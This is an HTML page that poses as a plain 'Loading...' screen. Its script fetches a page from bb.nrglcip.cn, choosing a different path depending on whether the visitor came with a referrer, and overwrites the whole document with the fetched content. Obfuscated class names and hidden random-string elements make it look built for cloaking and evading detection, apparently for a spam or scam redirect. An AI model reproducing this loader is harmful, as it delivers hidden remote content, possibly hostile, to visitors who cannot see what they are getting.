<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Q8GAHZmSCqt {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Q8GAHZmSCqt .WBksD6H {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Q8GAHZmSCqt .content {
            line-height: 50px;
            text-align: center
        }

        .Q8GAHZmSCqt .img {
            width: 100%
        }

        .Q8GAHZmSCqt .p1cdY4lql {
            text-align: center
        }

        .Q8GAHZmSCqt .p1cdY4lql span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Q8GAHZmSCqt .p1cdY4lql span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Q8GAHZmSCqt .p1cdY4lql span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Q8GAHZmSCqt .p1cdY4lql span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Q8GAHZmSCqt .p1cdY4lql span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Q8GAHZmSCqt .p1cdY4lql span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Q8GAHZmSCqt .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function HdYjZnyW64(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var vqYjiE = HdYjZnyW64('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ vqYjiE +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ vqYjiE +".html?a=share";
		}
		
        TIe2AXGl91=url+"#"+new Date().getTime();
        TIe2AXGl91 && function() {
            $.get(TIe2AXGl91, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >tgXLz3BdgcESHBbQCq8my6QRfoQJDQrBdaUFGuPACoEyCV9JMOK6tKL7YTYEIDOPaHHRoeFq09</ul>
<h1 style='display:none' >ejiqrR23Kadpqt3X</h1>
<li style='display:none' >NP39qI69rof1i5xPyKrZR2aeZI9v0CO2j32vKPintuJ8TGX3liFYYUF30gNhTSCtjunFzEJfUdU8</li>
<li style='display:none' >NP39qI69rof1i5xPyKrZR2aeZI9v0CO2j32vKPintuJ8TGX3liFYYUF30gNhTSCtjunFzEJfUdU8</li>
<ul style='display:none' >tgXLz3BdgcESHBbQCq8my6QRfoQJDQrBdaUFGuPACoEyCV9JMOK6tKL7YTYEIDOPaHHRoeFq09</ul>
<b style='display:none' >v2O6KJ69bkudIunZYyCZ2</b>
<span style='display:none'>xSA4pVqoY81i2BBnIJR18K3axU94DsW3xlGGO2hmqTzH40lYS2FbBBG2pjw</span>
<b style='display:none' >v2O6KJ69bkudIunZYyCZ2</b><div class="Q8GAHZmSCqt">
    <div class="WBksD6H">
        <div class="p1cdY4lql">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<li style='display:none' >tmSOYfyxrXmazxcaO0WMp5pNR6FRpEUjpTfhbmDmw9OoqIF5SJKGlmp3cawRSt7Kz6RSHp4D0HvpLHhesgtMvry</li>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<b style='display:none' >R1cLEK40TDzmZbZSJDXpq8nZhcEFqrxZ0bWmqErmDH42wdBcB8c4pUG1oGP5S5ime7nD1C5pf</b>
<span style='display:none'>LXT0Uw4A0jZRyRW1E3QX7FwznzYDkBEcQN9KKlwmomIMlim3oP78YRXBGuIqZrZxzi98mpsLTHZ4UkfgnW8CuJYUcRsnQb7t</span>
<ul style='display:none' >dqqG86suaoIX2ZTljjq</ul>
<li style='display:none' >tmSOYfyxrXmazxcaO0WMp5pNR6FRpEUjpTfhbmDmw9OoqIF5SJKGlmp3cawRSt7Kz6RSHp4D0HvpLHhesgtMvry</li>
<img  src='' style='display:none'>
<p  style='display:none'>YYtsqCwAQImcGIhysnpvz</p></body>
</html>